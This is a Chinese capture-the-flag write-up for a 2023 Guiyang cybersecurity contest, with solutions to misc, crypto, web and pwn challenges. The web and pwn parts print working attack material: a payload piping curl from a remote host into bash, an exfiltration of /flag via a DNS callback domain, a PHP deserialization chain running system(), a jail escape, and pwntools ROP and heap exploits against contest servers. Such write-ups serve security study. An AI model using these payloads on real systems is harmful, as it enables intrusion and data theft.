贵阳大数据及网络安全精英对抗赛WP

shenghuo2 收录于 Writeup

2023-05-02 2023-05-02 约 2200 字预计阅读 5 分钟

https://file.shenghuo2.top/typecho/202305020015506.png

警告

本文最后更新于 2023-05-02，文中内容可能已过时。

RANK

RANK:65

（LFI没交上就下了）

misc

传说中的小黑

打开jpg，

文件尾有个base64和zip

b64解得

1

flag{key=FFD8FFE0}

然后解压压缩包

flag文件头补FFD8FFE0

是二维码，扫码即可

wordexcelppt

docx作为压缩包解压

在errors.xml里有段base64

解码是二维码png，扫码得到flag

time

江苏工匠杯，时间刺客同款考点

1
2
3
4
5
6


import os
flag = ""
for i in range(38):
    flag += chr(int((str(os.path.getmtime(f"change{i}.txt")))[-5:-2]))

print(flag)

图片的秘密

docx作为压缩包解压

得到pass.txt和png

http://www.jsons.cn/imghideinfo

网站解

easymisc

change19的gif不一样

在14帧，扫码得到

1
2


https://pan.baidu.com/s/1D-XdJvkKWbVFoRx_AEZZzw?pwd=v6p6 
提取码：v6p6

然后下载game.tar

在\a12553183e6feaa32744e405985000f41591bdff85f9d81967a6405196e3a71a发现gif

拼二维码得到flag

cb0x-new

1
2
3
4


void main()
{
	system("/bin/bash");
}

构造交互式回显

flag在/home/ctf/main.c中

j@il-new

https://github.com/m1dm4n/CTF-WriteUp/blob/3e14d18186726847db7cbd7a37d567e7f9ecf474/2023/angstrom2023/obligatory/solve.py

angstromCTF2023原题

1

(__builtins__:=__import__('os'))and(lambda:system)()('sh')

qrsea （复现)

531张二维码，读图片分辨率

一共10种尺寸，从大到小当作0-9

然后组成数字

画tupper自指图像

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45


from PIL import Image
from collections import Counter

img_list = [f"{i}.png" for i in range(531)]

sizes = []
for img_name in img_list:
    img = Image.open(img_name)
    sizes.append(img.height)
    img.close()

sort = sorted(Counter(sizes))
flag = ""
for i in sizes:
    flag+= str(sort.index(i))

print(flag)
# ================= 画图 ======================

import numpy as np
import matplotlib.pyplot as plt


def Tupper_self_referential_formula(k):
    aa = np.zeros((17, 106))

    def f(x, y):
        y += k
        a1 = 2 ** -(-17 * x - y % 17)
        a2 = (y // 17) // a1
        return 1 if a2 % 2 > 0.5 else 0

    for y in range(17):
        for x in range(106):
            aa[y, x] = f(x, y)

    return aa[:, ::-1]


k = int(flag)
aa = Tupper_self_referential_formula(k)
plt.figure(figsize=(15, 10))
plt.imshow(aa, origin='lower')
plt.gca().invert_xaxis()
plt.show()

crypto

math

一个PoW

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


import itertools
import string
import hashlib

def s256(str:str):
    return (hashlib.sha256(str.encode()).hexdigest())

def PoW(str1:str,hash:str):
    for i in itertools.product(string.ascii_letters+string.digits,repeat=4):
        proof = "%s%s%s%s" % i + str1
        if s256(proof) == hash:
            print(proof[:4])
            break

另一个解方程

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


# sage
#p,q = var('p q')
#solve([(p**9)+(q**9)==2824822169624626054661488626925458420744715781080646942074253083493110409304139573698331220638806746185475842194119961243645804370254606328869920018072689414438851986763034645626556982418990163940800474549193470898195538208390077574728861492183878546810890489530709875694439708304188836872775133284206949916525601873082688977829638863138990316027434787047769932507784217745872371234159638863412009751336370516261263894787945468938670587885217215533551430379370918887017578135901512047635699889591590644728268209911213837545954673959103136577695532350503753325666353616999846273454813736702876968828262577312436890164868139215146941181825104314265142027185641195497429436701158821466597436322426101818844710031297488336024894303790150460476458932731090576824660354020881969224935848618388008509287249786048287099709905361669995934683044400119527112547308946141798312531702089592589519108535371095268166661526029944144811749355534331341058531140340843830280132820250819782775604064279338833095450886869781021370514423225666663969097910935332887127861068226704314810075641777615479058315604743490070494698514916318640565210625873112244649996112730726083223048152494260522865824835075057025248755461487069699219010214934196309822790800505679440651281428272245964425847552725070324370935048163205674057942566606069023173193117188785459966877961255640155226356782264373613291491124970651673222,(p**3)+(q**3)==2170975452570130427181048521695873973135933481372313804498232310176782170227124595928130478815483294370924323759914604172695746976894120890757779825855362817255229290661676271054758017616180660951572648811631474401996380573736869074007533444837272191850638568203334900550339868176862783180156627459202829081595794230688694799962290853974633400675886602057846186352130394606371882689934371132063210289099864922945499792531454940004181032574377548535600071749073142],p,q)


p = 9594047826943378377351189875982059550378092961629981934201818330211249023837891624869663520671840878621229056198869324834898357120275293602972034861979531

q = 10879917259777350236190881969122866735740638588895721372296776744093023576036252166941469241893414961612291902305518369155724747612316672092990811722587451

print((p*q) % (p+q))

线性代数

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62


E=[[48,11,39,15,22,11,52,59,39,11,61],
[16,56,43,35,36,48,40,9,19,50,65],
[10,48,40,29,70,29,12,33,36,27,67],
[57,38,26,61,64,70,37,45,70,1,39],
[58,44,20,58,26,42,31,33,10,28,69],
[26,55,27,57,69,45,52,62,55,6,24],
[45,10,4,65,16,60,54,45,25,22,32],
[33,20,15,12,25,56,15,70,44,25,69],
[30,62,23,9,45,15,70,0,20,20,15],
[24,1,41,24,70,70,42,59,18,0,29],
[0,2,23,17,67,52,57,68,58,65,46],]

A = [[29,60,16,59,40,4,34,57,1,55,67],
[9,1,44,67,5,20,30,6,42,66,25],
[44,1,24,69,24,23,3,43,42,20,52],
[47,63,2,7,50,35,11,22,59,35,0],
[19,7,36,59,64,2,50,47,30,7,31],
[19,24,48,2,32,41,60,43,50,60,32],
[31,11,62,11,68,27,57,4,66,38,46],
[25,30,63,52,36,65,61,25,22,4,64],
[38,35,39,2,43,39,67,57,19,26,21],
[14,25,14,40,30,52,70,45,70,5,55],
[10,6,18,32,3,20,23,52,25,45,27],]

B = [[25,14,12,18,22,12,0,68,21,57,61],
[34,23,10,47,25,26,61,26,70,6,20],
[31,28,23,42,63,21,19,16,21,20,14],
[27,48,28,17,1,64,30,49,4,62,48],
[51,67,8,28,8,6,5,5,19,27,5],
[25,30,48,41,8,55,10,18,61,38,35],
[8,45,69,64,55,33,15,21,3,41,59],
[53,15,56,53,14,3,52,0,15,40,48],
[31,63,42,18,37,56,32,5,70,11,15],
[56,15,3,46,5,68,24,70,64,27,25],
[44,69,65,13,70,17,16,30,39,56,62],]

C = [[64,53,46,34,58,23,63,8,58,17,34],
[9,29,67,42,10,35,16,53,29,55,53],
[46,20,7,56,47,20,61,38,11,37,67],
[54,0,53,26,38,46,62,18,9,33,57],
[54,44,59,53,18,40,58,56,38,40,45],
[37,24,10,29,41,5,58,24,20,46,49],
[19,63,18,7,37,46,41,62,58,59,21],
[60,45,44,12,21,9,63,67,50,31,18],
[36,68,19,1,0,61,34,49,21,11,58],
[5,35,26,32,36,41,35,12,5,25,27],
[51,42,69,16,28,28,5,8,42,26,19],]

alphabet = '=0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$!?_{}<>'
p = 71
E, A, B, C = [matrix(GF(p), _) for _ in [E, A, B, C]]
U = B * (A^-1)
S2 = A*U
R = (C*S2^(-4))^-1
M = U^-1*(E-U*R)

print("flag{",end='')
for k in range(24):
    i, j = 5*k // 11, 5*k % 11
    print(alphabet[int(M[i, j])],end='')

print("}")

eezzrrssaa

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


# sage

pr1, pr2 = list(), list()
for i in ps:
    pr2 += [int(i//q)]
    pr1 += [int(i%q)]
a1, b1 = 202320232023, 320232023202

B = list()
R.<a, b> = PolynomialRing(GF(q))
for i in range(len(pr2)-1):
    now = pr2[i]
    for j in range(t[i]):
        now = a*now+b
    B.append(now - pr2[i+1])
B = Ideal(B).groebner_basis()
for i in B:
	print(i)

求出a2 b2

lcg恢复

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54


from Crypto.Util.number import *

q = 863666614243448299685073534539782091614466038667659466359664255833879357401208752356758391473753149783695523347
ps = [488430779430824599064935338391249442829022539899115535143196485163487049206340136142789020350176476554441378462595965038290365842362034176672340569719593003574222248527447206361459719954322885881075726676950555671635007363, 707157149197462658139117084378634522562212403870035237598970809858394732217372944239689355077884840011520921058759306333833289658731807522052892377679354636501446734633867023331470805974187027036109531714774435994689042891, 476172773176400166870512700278283739900716339392176146031791100542596627419155254113738721222559386964568077259931246639803960023216418997484355347182274626554844693011339867671881591249587444088969603398209425951467440211, 479577456885290037281759580853233626951314430312455485422558946021203602708559915552877926123425413442096439066002524196474514162220000152373758925097140843218665566655451970747063255562540421337155353658793225970423042099]
n = 98507292107212647629392277192521724876575060525397166586602724341772322834661685719879043139101436908036967520130509456130010632959287915661915441539615555345261656834100254232656609022587219863738542204349757544278313022268849986380405350778976502504598388632375506019980481343421510001650112826277323670706717869878490374078543128198589764240329950804782453481144228576858436696625100959717702337809834581369797601972108713612318371100605389
c = 57773774305129316009141892175661507569534831447382854914588401185097291538023184369651537398951570363918970263297625149448254614479110835192103043721312687685309489008584881189077640538284919592229456061921760452134520765924458040140450750863491592935761079322474155890093610865852109521471075002695928101302724254321097314555582345987979625286958861654447780330651520542323214097640450289283886871665487690407096815701340627706657525543320274

class PRNG:
    def __init__(self, a, x, b ):
        self.a = a
        self.x = x
        self.b = b

    def next(self):
        ret = self.x
        self.x = (self.a * self.x + self.b) % q
        return ret


def get_prime(prng1,prng2,q):
    while 1:
        tmp = prng2.next() * q + prng1.next()
        if isPrime(tmp):
            return tmp

pr1, pr2 = list(), list()
for i in ps:
    pr2 += [int(i//q)]
    pr1 += [int(i%q)]
a1, b1 = 202320232023, 320232023202

t = list()
for i in range(len(pr1)-1):
    cnt = 0
    now = pr1[i]
    while now != pr1[i+1]:
        now = (a1*now+b1)%q
        cnt += 1
    t += [cnt]
print(t)


a2 = -721474313686950040760456718395855289332361081440581115357964297160374075412604063880198191814907640385556239775 % q
b2 = -42522514490869169124681320640539356074221591805568832332992800925663834398026485545017374651679305179842368739 % q

prng1 = PRNG(a1,pr1[-1],b1)
prng2 = PRNG(a2,pr2[-1],b2)
ps = [get_prime(prng1,prng2,q) for _ in range(3)]
for p in ps:
    if n % p == 0:
        q = n // p
        d = inverse(0x10001, n-p-q+1)
        print(long_to_bytes(int(pow(c, d, n))))
        break

web

仔细ping

1

?ip=nl flag.php

May_be

无参rce

1

/?exp=system('curl https://blog.shenghuo2.top/shE1l.html|bash');&a=eval(pos(pos(get_defined_vars())));

命令执行弹个shell

flag是700的，没权限

suid提权

cp有权限

https://blog.csdn.net/CP1024/article/details/123952966

suid提权

pop

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43


<?php
highlight_file(__FILE__);
class TT{
    public $key;
    public $c;
    public function __destruct(){
        echo $this->key;
    }

    public function __toString(){
        return "welcome";
    }
}

class JJ{
    public $obj;
    public function __toString(){
        ($this -> obj)();
        return "1";
    }
    public function evil($c){
        eval($c);
    }
    public function __sleep(){
        phpinfo();
    }
}

class MM{
    public $name;
    public $c;
    public function __invoke(){
        ($this->name)($this->c);
    }
    public function __toString(){
        return "ok,but wrong";
    }
    public function __call($a, $b){
        echo "Hacker!";
    }
}
$a = unserialize($_GET['bbb']);
throw new Error("NoNoNo");

链子

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


<?php

class TT{
    public $key;
    public $c;
}

class JJ{
    public $obj;
}

class MM{
    public $name = 'JJ::evil';
    public $c = 'system("ls /");';
}
$a = new TT();
$a ->key = new JJ();
$a ->key ->obj = new MM();
$b=array($a,0);
echo serialize($b);

gc回收，i:1 改成 i:0

1

?bbb=a:2:{i:0;O:2:"TT":2:{s:3:"key";O:2:"JJ":1:{s:3:"obj";O:2:"MM":2:{s:4:"name";s:8:"JJ::evil";s:1:"c";s:15:"system("ls /");";}}s:1:"c";N;}i:0;i:0;}

JUST_PROTO

js原型链污染

先set，存进redis缓存

1

http://39.106.143.69:28629/set?token=__proto__&key=redis_set&val=curl%20http://`base64%20/flag`.uoi23u.ceye.io/

然后发PUT包触发/bkup

1
2
3
4
5
6


PUT /bkup HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6

curl外带

notrce

过滤很多，但是还是剩下点

1

nl /flag | tee 1.txt

读1.txt

完美网站

解码那个重定向的base64

得到tupian.png

下载，文件尾得到ffffpq.php

base编码index.php

读源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


<?php
header("Content-type:text/html;charset=utf-8");


echo "别重定向了，赶快让我（?n=30-10,以内的数值。)-_-";
$image=$_GET['img'];

$allow = range(2,20);
shuffle($allow);

if(($_GET['n']==$allow[0])){
	$image = base64_decode($image);
	$data = base64_encode(file_get_contents($image));
	echo "<img src='data:image/png;base64,$data'/>";
}else{
	$image = base64_encode("tupian.png");
	header("location:/?img=".$image);
}

每次都shuffle

1

GET /?n=6&img=ZmZmZnBxLnBocA==

爆破n即可

it’s time

ssti，用fenjing梭

在根目录

cat /f1ag_g4lfcdecddefewfebge

pwn

easystack

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43


from pwn import *
context.log_level='debug'

# p=process("./pwn2")
p=remote('39.107.27.191',2960)

elf=ELF("./pwn2")
libc=ELF("./libc.so.6")
r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

puts_plt=0x401090
pop_rdi=0x401363
puts_got=elf.got['puts']
main_addr = elf.sym['main']
ru(b": \n")
s(b"a"*41)
ru(b"output: \n")
ru(b"a"*40)
can=u64(rud('\x00'))-0x61
ru(b": \n")
pl1=b'a'*40+p64(can)+b'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
s(pl1)
libc_addr = u64(ru(b"\x7f")[-6:].ljust(8, b"\x00"))-libc.sym['puts']
system=libc.sym['system']+libc_addr

bin_sh=0x1b45bd+libc_addr
pl2=b'a'*40+p64(can)+b'a'*8+p64(0x40101a)+p64(pop_rdi)+p64(bin_sh)+p64(system)
ru(b"input: \n")
s(b"1")
ru(b"input: \n")
sl(pl2)

shell()

easynote

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63


from pwn import *
# p = process('./pwn1')
p = remote('123.56.175.221',21819)
libc = ELF('./libc.so.6')

r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()

def add(size, data):
    sla(b"choice: ", b"1")
    sla(b"size: ", str(size))
    sa(b"data: ", data)

def dele():
    sla(b"choice: ", b"2")

def show():
    sla(b"choice: ", b"3")

def edit(data):
    sla(b"choice: ", b"4")
    sa(b"Data: ", data)

def clear():
    sla(b"choice: ", b"1" * 0x1000)


add(0x18, b'a' * 0x18)
for i in range(8):
    edit(b'\x00' * 16)
    dele()

add(0x28, b'a' * 0x28)
clear()
add(0x18, b'\xf0')
show()

libc.address = u64(ru(b'\x7f')[-6:].ljust(8, b'\x00')) - 112 - 16 - libc.sym['__malloc_hook']
clear()
add(0x28, b'a' * 0x28)
dele()
edit(b'\x00' * 16)
dele()
edit(p64(libc.sym['__free_hook']))
clear()
add(0x28, p64(libc.sym['__free_hook']))
clear()
add(0x28, p64(libc.sym['system']))
clear()
add(0x28, b'/bin/sh\x00')
dele()


shell()